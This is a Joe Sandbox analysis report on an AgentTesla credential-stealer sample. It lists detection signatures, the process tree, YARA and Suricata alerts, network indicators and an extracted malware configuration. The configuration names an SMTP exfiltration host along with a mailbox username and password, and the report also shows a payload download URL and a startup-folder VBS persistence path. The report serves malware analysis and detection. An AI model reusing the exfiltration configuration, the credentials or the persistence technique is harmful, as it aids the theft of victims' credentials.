Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#1550238.exe

Overview

General Information

Sample name:Ref#1550238.exe
Analysis ID:1567423
MD5:a31bcf203bb60f13de83211ac9d44d06
SHA1:8d559c68b94f38e6886f467080cbce53a2ae1654
SHA256:bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#1550238.exe (PID: 4920 cmdline: "C:\Users\user\Desktop\Ref#1550238.exe" MD5: A31BCF203BB60F13DE83211AC9D44D06)
    • InstallUtil.exe (PID: 5520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6992 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vdvfyt.exe (PID: 6740 cmdline: "C:\Users\user\AppData\Roaming\vdvfyt.exe" MD5: A31BCF203BB60F13DE83211AC9D44D06)
      • InstallUtil.exe (PID: 3908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 29 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Ref#1550238.exe.6ab0000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Ref#1550238.exe.3a34098.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Ref#1550238.exe.3a34098.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.Ref#1550238.exe.3a34098.4.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.Ref#1550238.exe.3843d28.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 12 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6992, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 5520, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49713
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 6992, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#1550238.exe, ProcessId: 4920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:17:46.883614+010020301711A Network Trojan was detected192.168.2.849713162.254.34.31587TCP
                      2024-12-03T15:18:23.121832+010020301711A Network Trojan was detected192.168.2.849720162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:16:09.896860+010028555421A Network Trojan was detected192.168.2.849713162.254.34.31587TCP
                      2024-12-03T15:16:46.430602+010028555421A Network Trojan was detected192.168.2.849720162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:16:09.896860+010028552451A Network Trojan was detected192.168.2.849713162.254.34.31587TCP
                      2024-12-03T15:16:46.430602+010028552451A Network Trojan was detected192.168.2.849720162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:17:46.883614+010028400321A Network Trojan was detected192.168.2.849713162.254.34.31587TCP
                      2024-12-03T15:18:23.121832+010028400321A Network Trojan was detected192.168.2.849720162.254.34.31587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 5.2.vdvfyt.exe.38777e0.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeReversingLabs: Detection: 44%
                      Source: Ref#1550238.exeReversingLabs: Detection: 44%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeJoe Sandbox ML: detected
                      Source: Ref#1550238.exeJoe Sandbox ML: detected
                      Source: Ref#1550238.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49719 version: TLS 1.2
                      Source: Ref#1550238.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8EA80
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8EA71
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B88AE5h0_2_06B88898
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B88AE5h0_2_06B88888
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B884FAh0_2_06B880F8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B884FAh0_2_06B880EA
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8EDEE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 4x nop then jmp 06B8EB70h0_2_06B8ED08
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BEDEE
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BED08
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BEA80
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069BEB70h5_2_069BEA71
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B8AE5h5_2_069B8898
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B8AE5h5_2_069B8888
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B84FAh5_2_069B80F8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 4x nop then jmp 069B84FAh5_2_069B80EA

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49720 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.8:49713 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: InstallUtil.exe, 00000003.00000002.2737945832.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3369187394.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.00000000036A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/EqqP
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#1550238.exe, vdvfyt.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.8:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49719 version: TLS 1.2

                      System Summary

                      barindex
